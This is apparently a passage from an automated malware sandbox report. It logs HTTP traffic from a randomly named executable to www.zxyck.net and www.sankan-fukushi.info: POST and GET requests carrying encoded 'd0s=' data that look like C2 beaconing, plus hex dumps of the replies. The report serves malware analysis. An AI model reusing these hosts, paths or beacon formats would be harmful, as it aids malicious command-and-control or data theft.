                                                                      Data Ascii: 2e///lt=/0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.749865118.107.250.103802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:55:25.040004969 CET1813OUTPOST /yp7g/ HTTP/1.1
                                                                      Host: www.zxyck.net
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US
                                                                      Origin: http://www.zxyck.net
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1248
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/yp7g/
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Data Raw: 64 30 73 3d 7a 33 72 70 4f 48 56 51 6c 74 76 2f 6c 73 71 73 62 4d 38 56 71 44 35 44 6c 77 53 79 30 72 41 75 63 71 6e 72 6c 7a 58 31 46 43 7a 7a 4a 50 51 56 72 4a 69 5a 6e 79 6a 6a 71 35 43 2f 52 50 38 47 33 53 50 4e 63 71 79 35 31 45 56 63 67 45 71 4d 66 62 6f 44 6a 32 34 5a 74 39 6a 58 70 73 35 2f 41 51 56 42 42 56 65 48 64 4c 39 53 2b 75 50 71 53 55 55 6e 6f 67 43 6b 69 65 42 39 35 49 39 43 7a 59 67 32 48 39 73 61 69 51 72 56 71 66 2b 56 32 6f 7a 6f 47 34 46 74 64 35 67 78 32 42 6e 4e 63 63 74 34 6e 39 42 51 47 49 38 50 70 4e 66 52 73 74 42 31 43 5a 49 31 48 46 76 6c 6f 31 76 42 4d 6d 34 2b 43 42 74 62 6c 45 66 72 59 37 7a 57 7a 54 67 39 52 32 2b 56 37 42 48 4f 42 4c 4d 39 36 43 72 67 7a 35 49 52 39 75 52 71 45 56 58 6b 74 6d 67 36 38 33 78 42 6b 67 67 72 68 79 6e 2f 34 56 62 58 4f 62 6f 62 68 6a 7a 47 6a 69 34 4f 55 54 4e 79 51 62 4c 43 37 52 36 57 69 49 69 35 6b 6c 44 38 6c 45 64 31 56 6d 73 4b 6c 70 66 58 7a 57 42 79 31 30 6f 34 52 68 4c 62 50 41 6b 4a 51 6b 59 4c 4d 48 4f 4d 35 36 4f 7a 36 47 [TRUNCATED]
                                                                      Data Ascii: d0s=z3rpOHVQltv/lsqsbM8VqD5DlwSy0rAucqnrlzX1FCzzJPQVrJiZnyjjq5C/RP8G3SPNcqy51EVcgEqMfboDj24Zt9jXps5/AQVBBVeHdL9S+uPqSUUnogCkieB95I9CzYg2H9saiQrVqf+V2ozoG4Ftd5gx2BnNcct4n9BQGI8PpNfRstB1CZI1HFvlo1vBMm4+CBtblEfrY7zWzTg9R2+V7BHOBLM96Crgz5IR9uRqEVXktmg683xBkggrhyn/4VbXObobhjzGji4OUTNyQbLC7R6WiIi5klD8lEd1VmsKlpfXzWBy10o4RhLbPAkJQkYLMHOM56Oz6GeFJ0AQQk0DidMmBFYsjzC++0xfeb5vErBcJTFvHZXJXAcMEjqHVLQtF7Q5n1APElgcDa5GZHXvk7NPwAzqGIz0dxfVI5s7I5fLLF6qnuacJPP7J6LkXR4VyZL5h+cEwyoezjZQbzEHFxImA6pAAEGa+ArEIBoCcH9A7KK9RD9jrC0ocsg+kcLYVJcS1p7u50MRD2KevmuqSC3p8LtFVnuIU2bcYeWAmZxxsT45vclFXU/ZCvO893cmZRvVy99Mp39yPN6ZbFsMGdP42kKjAm/xgtyXu2cXur5Ul7J+E6OYwiVZVrII1h7Y3RcF8ddqNxEIyy7dZluzQVhKzIgoF+rSMwOGyTx0IPJkw1Ooo/K7YMD/Ji2o6puoP7xcVTL+k/Ko1e5NPFLKkPCyp/LSXj3mc64vHovmxVfA86gI6+Kh0Qmh3BTICos9oFS0D4i8P6wnZkYhmOhMU3POr0+ox5FQg0B+yM3GLphQpDTF2jmcVnQnoy8YrNd+B7eOZE6gO101qVHsWljQ9OhYAhWTb9Muo4eQKVmWGvtPqilZbU4pfOvuoGOW6GjJbjMrWAsPFoAiLXXETMqdm7807XVD9c/+vnNEus7hY27Fl73P6XLWQ7PUa9Nf6XH8FG0yqqVLn0LSaXoY+Y+I70s4fySXViVQRpn+8n6ChEua [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.749871118.107.250.103802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:55:27.705939054 CET536OUTGET /yp7g/?d0s=+1DJNz9gq8XLlcrIMdQnpjVtkmq+0J8qQJntyAnHY0zwXJ4Cq6+S40LPv7uqAO8gziztE9nyxlcHp2WlW5MCgSEQjuWrksErLkV7H3W7JIE6+fLHeWIbuzK7jcVo7JJSnKFcAfYIk0fk&Zvd8B=gHrX0lXPMBRt-RA HTTP/1.1
                                                                      Host: www.zxyck.net
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Connection: close
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Nov 27, 2024 08:55:29.256972075 CET266INHTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 27 Nov 2024 07:54:27 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Data Raw: 31 63 0d 0a 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 7a 78 79 63 6b 2e 6e 65 74 2f 79 70 37 67 2e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 1c/www/wwwroot/zxyck.net/yp7g.0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.749908163.44.185.183802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:55:44.453521013 CET810OUTPOST /aayz/ HTTP/1.1
                                                                      Host: www.sankan-fukushi.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US
                                                                      Origin: http://www.sankan-fukushi.info
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 216
                                                                      Connection: close
                                                                      Referer: http://www.sankan-fukushi.info/aayz/
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Data Raw: 64 30 73 3d 49 77 4d 6b 76 35 5a 61 58 66 70 39 6b 49 52 72 43 63 38 4d 31 78 52 38 78 78 67 58 39 74 71 78 51 32 4d 58 4a 45 78 66 63 39 35 62 33 37 4e 30 6b 79 38 68 42 6d 41 72 77 69 4d 69 50 79 6a 33 4a 68 78 34 42 35 35 79 67 6c 4f 59 46 50 38 44 31 78 70 30 4c 2b 35 4e 45 52 68 74 67 5a 59 53 70 4f 4f 6e 6e 55 4c 73 6e 4d 78 4c 41 65 75 53 6e 6d 62 69 73 75 65 6c 75 67 69 77 4f 4d 6f 79 42 46 66 44 45 36 55 39 64 49 76 77 4a 62 62 5a 6b 62 6b 35 57 54 48 41 70 66 37 6f 50 59 46 51 6b 69 6f 72 38 45 58 6f 6f 4e 6d 78 78 47 41 35 43 54 7a 76 78 39 2f 68 56 6e 4e 67 6e 44 31 57 74 48 4b 4c 61 64 56 64 65 35 75 6f 57 4a 49 6a 77 51 3d 3d
                                                                      Data Ascii: d0s=IwMkv5ZaXfp9kIRrCc8M1xR8xxgX9tqxQ2MXJExfc95b37N0ky8hBmArwiMiPyj3Jhx4B55yglOYFP8D1xp0L+5NERhtgZYSpOOnnULsnMxLAeuSnmbisuelugiwOMoyBFfDE6U9dIvwJbbZkbk5WTHApf7oPYFQkior8EXooNmxxGA5CTzvx9/hVnNgnD1WtHKLadVde5uoWJIjwQ==
                                                                      Nov 27, 2024 08:55:45.976119041 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 27 Nov 2024 07:55:45 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 19268
                                                                      Connection: close
                                                                      Server: Apache
                                                                      Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                      Accept-Ranges: bytes
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                      Nov 27, 2024 08:55:45.976160049 CET231INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                      Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -m
                                                                      Nov 27, 2024 08:55:45.976171017 CET1236INData Raw: 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74
                                                                      Data Ascii: s-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap; flex-wr
                                                                      Nov 27, 2024 08:55:45.976309061 CET1236INData Raw: 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 31 3b
                                                                      Data Ascii: e; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
                                                                      Nov 27, 2024 08:55:45.976322889 CET1236INData Raw: 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 35 70 78
                                                                      Data Ascii: .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media screen a
                                                                      Nov 27, 2024 08:55:45.976414919 CET1236INData Raw: 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66
                                                                      Data Ascii: /svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-30.153 1
                                                                      Nov 27, 2024 08:55:45.976425886 CET1236INData Raw: 36 20 31 2e 31 35 33 2e 35 39 34 20 31 2e 38 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20 31 2e 33 2d 36 2e 31
                                                                      Data Ascii: 6 1.153.594 1.8.557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.527c-.40
                                                                      Nov 27, 2024 08:55:45.976438046 CET1236INData Raw: 2e 36 32 31 2d 31 2e 36 37 31 2d 2e 38 32 34 2d 31 2e 39 33 32 2d 31 2e 32 34 36 2d 34 2e 30 31 31 2d 31 2e 32 34 31 2d 36 2e 31 31 31 2d 2e 33 38 39 2d 36 2e 37 38 38 20 31 2e 30 33 33 2d 38 2e 31 32 37 20 33 2e 39 36 36 2d 38 2e 32 39 33 68 2e
                                                                      Data Ascii: .621-1.671-.824-1.932-1.246-4.011-1.241-6.111-.389-6.788 1.033-8.127 3.966-8.293h.4c.392-.013.783.049 1.152.181-.185 1.468-.28 2.946-.284 4.425-.01 3.674.495 7.332 1.5 10.866l-.072.061zm26.365 19.475h-.15c-10.071 0-18.9-8.293-22.447-19.566.168
                                                                      Nov 27, 2024 08:55:45.976449966 CET1236INData Raw: 2e 37 38 2e 30 31 35 20 33 2e 32 2d 31 2e 37 37 36 20 33 2e 32 31 37 2d 34 2e 30 36 34 2e 30 31 37 2d 32 2e 32 38 38 2d 31 2e 33 37 36 2d 34 2e 30 37 39 2d 33 2e 31 37 32 2d 34 2e 30 39 34 7a 6d 32 36 2e 32 2e 31 32 63 2d 31 2e 38 20 30 2d 33 2e
                                                                      Data Ascii: .78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26.2.12c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.394 4.091 3.19 4.091s3.2-1.776 3.217-4.064c.017-2.288-1.391-4.091-3.187-4.091h-.003zm-29.1-2.182c-.701-.023-1.326-.45-1.602-1.09
                                                                      Nov 27, 2024 08:55:45.976463079 CET1236INData Raw: 33 30 36 2d 2e 30 31 36 2d 2e 34 38 31 2e 31 36 2d 2e 39 34 39 2e 34 38 39 2d 31 2e 33 2e 34 39 34 2d 2e 35 33 33 20 31 2e 32 36 34 2d 2e 37 31 20 31 2e 39 34 2d 2e 34 34 35 2e 36 37 37 2e 32 36 35 20 31 2e 31 32 32 2e 39 31 38 20 31 2e 31 32 32
                                                                      Data Ascii: 306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265 1.122.918 1.122 1.645-.153 2.481-.842 4.9-2.02 7.089l1.586 2c.428.536.517 1.267.228 1.889-.289.622-.904 1.027-1.59 1.046l-.004-.004zm26.535 11.408l-17.284-.647c-.997-.038-1.776


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.749917163.44.185.183802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:55:47.119599104 CET830OUTPOST /aayz/ HTTP/1.1
                                                                      Host: www.sankan-fukushi.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US
                                                                      Origin: http://www.sankan-fukushi.info
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 236
                                                                      Connection: close
                                                                      Referer: http://www.sankan-fukushi.info/aayz/
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Data Raw: 64 30 73 3d 49 77 4d 6b 76 35 5a 61 58 66 70 39 69 6f 68 72 4f 62 41 4d 77 52 52 39 74 42 67 58 30 4e 71 31 51 32 51 58 4a 41 70 50 63 4c 52 62 33 5a 46 30 6c 7a 38 68 43 6d 41 72 6c 53 4d 72 58 53 6a 38 4a 68 74 77 42 35 46 79 67 6b 71 59 46 50 4d 44 31 47 39 33 4e 2b 35 50 4d 78 68 72 75 35 59 53 70 4f 4f 6e 6e 55 66 47 6e 4d 70 4c 41 75 2b 53 31 33 62 6a 76 75 65 6d 35 51 69 77 5a 38 6f 32 42 46 65 57 45 2f 39 51 64 4b 58 77 4a 61 72 5a 6b 4a 4d 36 63 54 48 4f 6d 2f 36 6b 49 61 78 66 38 58 34 62 39 43 4c 44 70 71 32 67 39 51 42 62 59 78 2f 44 76 73 48 61 52 6c 70 57 77 6c 6f 6a 76 47 4f 54 58 2f 68 38 42 4f 4c 43 62 62 70 6e 6d 71 4e 4a 57 50 57 57 63 76 6b 56 54 70 36 66 50 7a 2b 45 6d 6a 77 3d
                                                                      Data Ascii: d0s=IwMkv5ZaXfp9iohrObAMwRR9tBgX0Nq1Q2QXJApPcLRb3ZF0lz8hCmArlSMrXSj8JhtwB5FygkqYFPMD1G93N+5PMxhru5YSpOOnnUfGnMpLAu+S13bjvuem5QiwZ8o2BFeWE/9QdKXwJarZkJM6cTHOm/6kIaxf8X4b9CLDpq2g9QBbYx/DvsHaRlpWwlojvGOTX/h8BOLCbbpnmqNJWPWWcvkVTp6fPz+Emjw=
                                                                      Nov 27, 2024 08:55:48.537363052 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 27 Nov 2024 07:55:48 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 19268
                                                                      Connection: close
                                                                      Server: Apache
                                                                      Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                      Accept-Ranges: bytes
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                      Nov 27, 2024 08:55:48.537409067 CET231INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                      Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -m
                                                                      Nov 27, 2024 08:55:48.537422895 CET1236INData Raw: 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74
                                                                      Data Ascii: s-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap; flex-wr
                                                                      Nov 27, 2024 08:55:48.537481070 CET1236INData Raw: 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 31 3b
                                                                      Data Ascii: e; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
                                                                      Nov 27, 2024 08:55:48.537493944 CET1236INData Raw: 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 35 70 78
                                                                      Data Ascii: .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media screen a
                                                                      Nov 27, 2024 08:55:48.537507057 CET1236INData Raw: 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66
                                                                      Data Ascii: /svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-30.153 1
                                                                      Nov 27, 2024 08:55:48.537522078 CET1236INData Raw: 36 20 31 2e 31 35 33 2e 35 39 34 20 31 2e 38 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20 31 2e 33 2d 36 2e 31
                                                                      Data Ascii: 6 1.153.594 1.8.557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.527c-.40
                                                                      Nov 27, 2024 08:55:48.537733078 CET1236INData Raw: 2e 36 32 31 2d 31 2e 36 37 31 2d 2e 38 32 34 2d 31 2e 39 33 32 2d 31 2e 32 34 36 2d 34 2e 30 31 31 2d 31 2e 32 34 31 2d 36 2e 31 31 31 2d 2e 33 38 39 2d 36 2e 37 38 38 20 31 2e 30 33 33 2d 38 2e 31 32 37 20 33 2e 39 36 36 2d 38 2e 32 39 33 68 2e
                                                                      Data Ascii: .621-1.671-.824-1.932-1.246-4.011-1.241-6.111-.389-6.788 1.033-8.127 3.966-8.293h.4c.392-.013.783.049 1.152.181-.185 1.468-.28 2.946-.284 4.425-.01 3.674.495 7.332 1.5 10.866l-.072.061zm26.365 19.475h-.15c-10.071 0-18.9-8.293-22.447-19.566.168
                                                                      Nov 27, 2024 08:55:48.537746906 CET1236INData Raw: 2e 37 38 2e 30 31 35 20 33 2e 32 2d 31 2e 37 37 36 20 33 2e 32 31 37 2d 34 2e 30 36 34 2e 30 31 37 2d 32 2e 32 38 38 2d 31 2e 33 37 36 2d 34 2e 30 37 39 2d 33 2e 31 37 32 2d 34 2e 30 39 34 7a 6d 32 36 2e 32 2e 31 32 63 2d 31 2e 38 20 30 2d 33 2e
                                                                      Data Ascii: .78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26.2.12c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.394 4.091 3.19 4.091s3.2-1.776 3.217-4.064c.017-2.288-1.391-4.091-3.187-4.091h-.003zm-29.1-2.182c-.701-.023-1.326-.45-1.602-1.09
                                                                      Nov 27, 2024 08:55:48.537763119 CET1236INData Raw: 33 30 36 2d 2e 30 31 36 2d 2e 34 38 31 2e 31 36 2d 2e 39 34 39 2e 34 38 39 2d 31 2e 33 2e 34 39 34 2d 2e 35 33 33 20 31 2e 32 36 34 2d 2e 37 31 20 31 2e 39 34 2d 2e 34 34 35 2e 36 37 37 2e 32 36 35 20 31 2e 31 32 32 2e 39 31 38 20 31 2e 31 32 32
